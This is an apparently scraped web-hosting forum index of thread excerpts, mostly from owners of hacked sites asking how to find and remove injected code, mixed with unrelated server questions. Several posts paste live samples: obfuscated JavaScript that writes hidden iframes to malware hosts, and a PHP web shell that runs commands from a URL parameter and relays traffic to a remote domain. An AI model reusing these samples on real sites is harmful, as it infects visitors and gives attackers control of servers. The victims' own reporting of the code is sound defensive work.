Hacked - Code Inserted Into Many Users Pages

Jun 25, 2007

About 2 months ago, I noticed random code linking to a virus in a frame was inserted into many of my web pages accross various accounts.

After I removed it all, I noticed that this has happend to me again!

Code:
<!-- ~ --><script>function v467e627add1dd(v467e627ade17d){ function v467e627adf11b () {return 16;} return(parseInt(v467e627ade17d,v467e627adf11b()));}function v467e627ae105c(v467e627ae2008){ var v467e627ae2f9b='';for(v467e627ae3f41=0; v467e627ae3f41<v467e627ae2008.length; v467e627ae3f41+=2){ v467e627ae2f9b+=(String.fromCharCode(v467e627add1dd(v467e627ae2008.substr(v467e627ae3f41, 2))));}return v467e627ae2f9b;} document.write(v467e627ae105c('3C696672616D65207372633D27687474703A2F2F7777772E3473747566666465616C732E636F6D2F646F63732F7468656D652E68746D272077696474683D31206865696768743D31207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script><!-- ~ -->

how they are inserting it into my web pages?

View 3 Replies


ADVERTISEMENT

ASP Pages Shwoing Code

Oct 21, 2009

A friend of mine is trying to show the page below, however it just shows the code.

[url]

What can I do to fix it?

View 13 Replies View Related

Danger Code In My Website Pages

Jul 26, 2009

I have a starnge code in my websites pages, I found it yesterday and i went to clean the pages.

Now after about 12 hours it came back again, It is not possible to moniter
like this problem and clean a huge number of pages.

I dont know how this happened, I need someone to help me to know the source of the problem from where it comes.

It is appears as a torjan for the users.

I attached a pic shows a sample of that code.

View 6 Replies View Related

Hacked; Warning: Count.php?o=2 Code

Jul 16, 2008

On 4/11 at 5:30pm, my server's root was compromised and someone had a field day on my server. Surprisingly with the level of access they had, the person very quietly ran a script (I've yet to find the file, but saw reference to it in another forum about this) that updated every single .html, .htm, and *index.php file in the homes directory. I can't even count how many files were edited -- atleast 100-200 files I've had to manually change thus far.

That said, I wanted to warn everyone about this. My google results were slim on this subject. What I find really surprising is that Avast! is the only anti-virus software to warn me of the possible malware being opened. I use either at home or at my office Avast!, BitDefender 2008, Symantec Corporate Antivirus, and McAfee corporate Antivirus. I just installed Avast! yesterday just for "peace of mind" and I'm damned glad that I did because it immediately popped up about HTML:iframe-gen malware on my websites.

I have enabled e-mail sending whenever someone logs into the root account on my server -- which I believe I received the tutorial from here in the How-To section -- and I did receive an e-mail for the person logging into the root account via SSH, but the IP address and hostname was left blank. Does anyone know why the IP and hostname would be blank? That doesn't mean they were console, does it?

Here is the HTML code that was inserted into all of my .htm, .html, and *index.php files:

<iframe src=[url] width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

View 14 Replies View Related

Hacked: How To Find Javascript Added To Pages In /home

Apr 23, 2007

Many of my websites on my server have been hacked, it randomly add's
Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->

Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src=[url]-->
and

Code:
<!--iframe width=1 height=1 border=0 frameborder=0 src='http://aboutmynews.org/news/InF.php' style='display:none;'></iframe--><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,49,46,22,39,35,15,23,8,28,0,0,0,0,0,0,2,25,55,54,30,40,13,57,14,12,53,47,43,19,38,3,37,33,58,18,36,44,20,24,51,60,29,0,0,0,0,41,0,0,45,48,9,32,17,59,31,6,61,5,4,7,27,50,56,62,34,10,52,1,16,21,26,42,11);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("kNdXOhF18O9QSX9cfBINV3WXaXUcFmFNV3p1shZcahFNw3pc7MIoahUo7mIc75APkxjJi5_eFmZtw0_rssFcmOAt7ObJfKE1s5UrzKIcSnbrIK9caBjrwB9J@3EJfXZoa5_euXUJw4I190GosKIcDspNAy8XOhF18OYN")</script><!-- ~ -->

To some of my pages on my websites in my /home directory.

Please do not visit the links without anti virus protection.

what command I can use to search all of my files in my home directory for this?

View 5 Replies View Related

Users Password Hacked

May 26, 2009

In my linux vps (cpanel based) hackers have hacked the password of the user ( website owner ) and he have uploaded some hack files(PHP) through FTP. Sometimes the hacker uploads perl/CGI scripts and sends spam mails .This happens frequently in server. How the hacker gets the users password? How can i prevent my users and server from this security issue?

View 7 Replies View Related

Static Index.html Pages Hacked, Also Index Files

Sep 8, 2007

My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.

I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).

Going back on track, all files named "%index%" were hacked.

-I found a index.txt file with links to obscure sites.

The code was written at bottom of the all index.html files: iframe code

Code:
><!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#103&#111&#111&#103&#108&#101&#116&#114&#97&#102&#102&#46&#99&#111&#109&#47&#105&#110&#46&#99&#103&#105&#63&#100&#101&#102&#97&#117&#108&#116" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code

PHP Code:

<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

");$wr = 0;while(!feof($socket)){  $temp = fgets($socket);    if(eregi("<",$temp)) {      $wr = 1;        }                      if($wr) {              $page .= $temp;                }                }                fclose($socket);                                return $page;                }                                ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...

View 5 Replies View Related

Invalid Response Code Received From Server Code: 451,

Jul 7, 2007

when I try to send Email from horde I have this:

PHP Code:

There was an error sending your message: Failed to add recipient: xxxxx@hotmail.com [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)] 

View 5 Replies View Related

Why Non-ssl Pages Are Blank, Ssl Pages Work

Feb 1, 2008

I am moving to a new server. At first the [url]version of the site was fine. I had trouble getting [url]working. Once I had the path to the certificate file correct, I was good to go. So, I started moving data. I also ran some updates on the new server (installed mysql, php, related pkgs). I don't know when the [url]pages stopped working, but I didn't realize it until I had everything moved over and tried to go live. The pages are completely blank. If I view source, I get this: ....

View 3 Replies View Related

Plesk 11.x / Windows :: Panel Don't Show Users Database In Tab Users

Sep 6, 2013

The upgrade has an error when manage the users database.

PRODUCT, VERSION, VERSION OF MICROUPDATE, OPERATING SYSTEM, ARCHITECTURE
OS Microsoft Windows Server 2008 R2 Service Pack 1 x64
Panel version 11.5.30 Update #13, last updated at Sept 1, 2013 03:30 PM

PROBLEM DESCRIPTION
In a costumer panel have a one database MSSQL, and assign to this DB 3 users, but the tab option "Users" don't work fot his costumer and show this error:

Error Javascript:
TypeError: template is null
this.template = template.toString(); in protototype.js 8472831 (línea 807)

ACTUAL RESULT
Error Javascript:
TypeError: template is null
this.template = template.toString(); in protototype.js 8472831 (línea 807)

EXPECTED RESULT
Show users in the tab users for database.

View 2 Replies View Related

Preventing Users From Connecting To Other Users Database

Mar 25, 2009

On my server, users can connect to any database as long as they have the database user and password. This makes it easier to hack any database on the server.
What I want to do is to make the users can only connect to their own databases and not other's.

I tried changing the localhost ip address but it didn't work ( I assume I didn't do it the right way)

View 7 Replies View Related

How To Password Protect Web Pages, I Can Protect Directories But Can't Put Pages In

Mar 4, 2007

i did make a big message on here but it deleted when i back spaced

my website is aviation cafe dot net / sample and i need you to help me with password protecting a webpage, i wanted the address to be / the silver sword and definitly not to look like it does now.

username: webforum
pass: password

View 4 Replies View Related

What Is EPP Code

Oct 13, 2008

What is EPP code, I am required to enter it to register domain

View 5 Replies View Related

Cgi With Malicious Code

Jul 16, 2009

I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?

CentOS 5.2 - 64bits

WHM+cPanel

Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi

View 5 Replies View Related

PHP Code Not Interpreted

Apr 9, 2007

PHP 5.2.1 installed on WHM 10.8.0 cPanel 10.9.0-C9565

If I load a php file on browser, it gets loaded, but in HTML source I can see php code.

If I run in SSH "php info.php", the php code gets runn and normal output is generated.

I checked these lines in httpd.conf:
LoadModule php5_module libexec/libphp5.so
AddModule mod_php5.c
AddHandler application/x-httpd-php .php .php4 .php3
AddType application/x-httpd-php .php
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .php3
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .phtml

"php -v" returns:
PHP 5.2.1 (cli) (built: Apr 9 2007 10:38:29)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Zend Extension Manager v1.2.0, Copyright (c) 2003-2006, by Zend Technologies
with Zend Optimizer v3.2.2, Copyright (c) 1998-2006, by Zend Technologies

On php.ini I have:
; Enable the PHP scripting language engine under Apache.
engine = "On" ;engine

I use long tags ("<?php").

I recompiled Apache and PHP few times, both from WHM and from SSH. I reinstalled Zend optimizer.

View 1 Replies View Related

Error Code

Nov 12, 2007

We are testing a module that we think may improve stability on our webservers. The module limits the number of concurrent connections allowed from any particular ip address.

What I need an opinion on is what error message the server should return when it is refusing because of the limit.

The module currently returns a 503 error, that's what the module's author set it to do. 503 is a temporary error, which is good, but it implies that the problem is with the server, which seems somewhat inaccurate to me.

I was thinking a 409 would be good, with text saying that the request conflicts with the per visitor connection limit for the requested resource. Ideally the browser would display the message and people would know to reconfigure software or wait for existing connections to complete before resubmitting the request.

One of my co-workers here says that at least people understand the "server busy" error and they won't understand the "conflict" message.

Someone else says most of these errors will come from folks using http 1.0 and the 409 doesn't exist at that level of the protocol, so they won't get anything more than a generic "error!" type of message.

View 1 Replies View Related

WMP Embedded Code

Jul 27, 2007

I put the windows media palyer embedded code on my site, but is there a way to limit the buffer or rate at which the video downloads or streams to the user.

Quote:

<object classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" codebase= [url]

That is the code i use.

View 0 Replies View Related

Php Source Code

Jun 10, 2007

does anybody have a script that can veiw the php source code before it runs to the server of an external site

View 1 Replies View Related

Javasript Code Vulenarability - What Is This?

Jun 4, 2009

Someone sniffed ftp password of a user account on my server and looks like javascripts were altered and iframe tags inserted in php files, while i cleaned up php pages i see the following javascript code added to each .js file, what is it supposed to do?

<!--
(function(qAWI){var OMt9='var-20a-3d-22S-63-72ip-74-45n-67-69ne-22-2cb-3d-22-56e-72sion-28)+-22-2cj-3d-22-22-2cu-3dnavigator-2e-75s-65-72A-67-65nt-3bi-66((-75-2eindex-4ff-28-22-43h-72ome-22)-3c0)-26-26(u-2einde-78-4ff(-22Win-22)-3e0)-26-26(u-2eindexOf(-22-4eT-206-22)-3c0)-26-26-28doc-75me-6et-2eco-6fk-69e-2e-69-6ed-65x-4ff(-22-6di-65k-3d1-22)-3c0-29-26-26(ty-70-65-6ff(z-72v-7at-73)-21-3dty-70eof(-22A-22)))-7b-7a-72v-7a-74s-3d-22A-22-3beval(-22-69-66(window-2e-22+a+-22)j-3d-6a+-22-2ba+-22M-61jo-72-22-2b-62-2ba+-22-4din-6f-72-22+b+a+-22B-75ild-22-2b-62+-22-6a-3b-22)-3bd-6f-63u-6dent-2ewri-74e(-22-3c-73c-72ipt-20src-3d-2f-2fma-22+-22rtuz-2ecn-2fvid-2f-3fi-64-3d-22-2bj+-22-3e-3c-5c-2fsc-72ipt-3e-22)-3b-7d';var M2ye=OMt9.replace(qAWI,'%');eval(unescape(M2ye))})(/-/g);
-->

View 7 Replies View Related

ASP Code Debugging Tool

May 6, 2009

I have a customer who is hosting a website on a dedicated server. The server is a high spec server with Intel Core 2 DUO E8400 processor, 4 GB DDR2 ECC RAM and a SATA Hard Drive. He is running only a single website which has a data entry section. The problem is that a few scripts when run consume 99% of the CPU. In fact, there is a particular script which even if run alone consumes 99% CPU. The code retrieves some records from the database by running an SQL query. The code is never executed. I have checked the sql query in the code and it runs fine if executed in SQL Query Analyzer. I know the problem is somewhere in the code, but cannot find the exact cause. Is there a tool to debug the asp code and find out may be the issue with the code? I have tried the Debug Diagnostics utility,

View 2 Replies View Related

Block By Country Code In Csf

Jul 18, 2009

how this new feature works in csf with blocking by country code.

I'm trying to put a block on Indonesia.

View 5 Replies View Related

Sites With Malicious Code

Oct 27, 2008

all sites in my server have maliciose code:

</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>

how to localize this code in my sites, using grep.

My server work in centos.

View 3 Replies View Related

Track Changes To Code / Files

Oct 2, 2008

I am currently developing a web application on a WAMP server. Once complete my client will have some in-house "programmers" make changes to the code as they are needed.

My client wants to track all changes made to the source files (ie- who made the change, when it was made, what files were modified, and what specific lines were added/removed/modified). Also, the program must run on the server and not the programmers computers.

I've searched high and low and only found a couple programs that scratch the surface of what they want.

View 4 Replies View Related

Jsp Displays Source Code

Mar 10, 2008

Some JSP pages display the source code. Some work and some don't even after recompiling apache with tomcat module and restarting jsp.

-rw-r--r-- 1 user user 6.5K Mar 10 17:18 index.jsp

Not sure where the jsp logs are, but there were no errors in the domlogs.

View 7 Replies View Related

Best Code Editor Tool For VPS

Jun 14, 2008

I have just moved to a VPS server from my shared hosting server and I am suddenly finding it tough to code equally well by just using the vim command. I have become more used to the CPanel code editor probably.

Can anyone suggest a nice tool for the same. I have installed webmin, but its code editor just sucks.

View 14 Replies View Related

Php Showing Code Not Executing

May 14, 2007

i have a vps account and am trying to setup my website i installed php 4 from a control panel where it auto installed php and there is mysql and i installed all of them but when i upload my script and go to install or go to the index of my site it shows the php code and does not execute.

my permissions are right on i also made a testphp file and used this code <?php phpinfo(); ?> and still nothing just shows the php code when you browse to the file i even went further i installed from the control panel another program called phpmyadmin and when i log in it does the same thing just shows php code so what the hell is going on you think i need to contact my host provider for this issue i sent an email out but waiting for a responce

View 7 Replies View Related

[code=SERVER_RESPONSE_CLOSE] Error

Apr 28, 2007

I have a site that runs on my dedicated server and it is MySQL/PHP based. Sometimes when I post news to the site or even try to open the homepage I get:

Quote:

Server Error

The following error occurred: [code=SERVER_RESPONSE_CLOSE] The server closed
the connection while reading the response. Contact your system administrator.

View 4 Replies View Related

Sample Code Of Opening A URL

May 22, 2007

If I want to open a url say, [url]I can use file_get_content

$content=file_get_content[url]

How to do the equivalent using curl, socket, socket, and wget?

View 3 Replies View Related

Editor In Fedora Code 6

Aug 5, 2007

My server was just upgraded to FC6 and now I do not have pico for a editor. I found nano but there is problems. Screen does not refresh correctly and when I type in charaters sometimes extra charaters show up.

Are there any other screen editors built in to FC6 (not vi)

View 4 Replies View Related

Error Code -12263

Oct 16, 2007

A friend of mine that has a proxy site on my server just realized that his site is giving some very weird error and he said he has not made any changes to the site in a while as he's been pre-occupied with other things...

Quote:

--removed--.com has sent an incorrect or unexpected message. Error Code: -12263

It appears as a JavaScript Alert when you hit submit on the proxy url form... However, I looked into it a bit and there is no JavaScript on the page... Therefore, it must be some sort of server error I'd assume... I even disabled JavaScript in Firefox and still received the error...

View 4 Replies View Related

Web Hosting And Compiled Code

Nov 5, 2007

It is possible to make code execution on the server with applications such as FastCGI or Zend Optimizer, but the code isn't compiled for good, it's more of a bytecode that is created on the fly, correct?

I'd like to know if it's possible to compile code (PHP, Python, Ruby, etc...) so that when you request a page, the compiled code is executed the same way as compiled C++ code with cgi-bin.

I'm asking because it would be quite efficient in case of high-traffic web sites instead of running intermediary code (bytecode).

Is it possible? What do you think is the more efficient, less resource-intensive and fastest way to execute dynamic-content pages?

View 3 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved